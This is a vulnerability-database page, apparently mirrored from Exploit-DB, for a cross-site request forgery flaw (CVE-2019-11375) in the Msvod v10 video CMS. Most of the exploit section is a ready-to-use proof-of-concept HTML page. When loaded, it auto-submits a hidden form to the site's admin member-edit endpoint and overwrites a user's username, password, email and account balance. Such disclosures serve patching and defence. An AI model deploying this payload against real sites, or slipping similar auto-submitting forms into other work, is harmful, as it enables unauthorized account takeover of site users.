Lucene search
K

Msvod 10 - Cross-Site Request Forgery (Change User Information)

🗓️ 22 Apr 2019 00:00:00Reported by ax8Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 74 Views

Msvod v10 CSRF vulnerability allows unauthorized user information chang

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Msvod 10 - Cross-Site Request Forgery (Change User Information) Exploit
22 Apr 201900:00
zdt
CVE
CVE-2019-11375
20 Apr 201914:35
cve
Cvelist
CVE-2019-11375
20 Apr 201914:35
cvelist
EUVD
EUVD-2019-3053
7 Oct 202500:30
euvd
exploitpack
Msvod 10 - Cross-Site Request Forgery (Change User Information)
22 Apr 201900:00
exploitpack
NVD
CVE-2019-11375
20 Apr 201915:29
nvd
OSV
CVE-2019-11375
20 Apr 201915:29
osv
Packet Storm
Msvod 10 Cross Site Request Forgery
23 Apr 201900:00
packetstorm
Prion
Design/Logic Flaw
20 Apr 201915:29
prion
RedhatCVE
CVE-2019-11375
9 Jan 202610:11
redhatcve
Rows per page
# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information

# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: https://www.msvodx.com/
# Version: v10
# CVE : CVE-2019-11375

 

Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.

 

<!--poc.html(change user infomation)-->

<!DOCTYPE html>

<html>

  <head>

  <title> CSRF Proof</title>

  <script type="text/javascript">

    function exec1(){

      document.getElementById('form1').submit();

    }

  </script>

  </head>

  <body onload="exec1();">

    <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">

      <input type="hidden" name="username" value="hacker1" />

  <input type="hidden" name="nickname" value="hacker1" />

  <input type="hidden" name="email" value="hacker1" />

  <input type="hidden" name="tel" value="hacker1" />

      <input type="hidden" name="password" value="hacker1" />

      <input type="hidden" name="out_time" value="1970-01-01" />  

  <input type="hidden" name="money" value="30" />

  <input type="hidden" name="is_permanent" value="0" />

  <input type="hidden" name="status" value="1" />

  <input type="hidden" name="id" value="821" />

    </form>

  </body>

</html>

MISC:http://www.iwantacve.cn/index.php/archives/198/

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2019 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 36.5
EPSS0.00273
74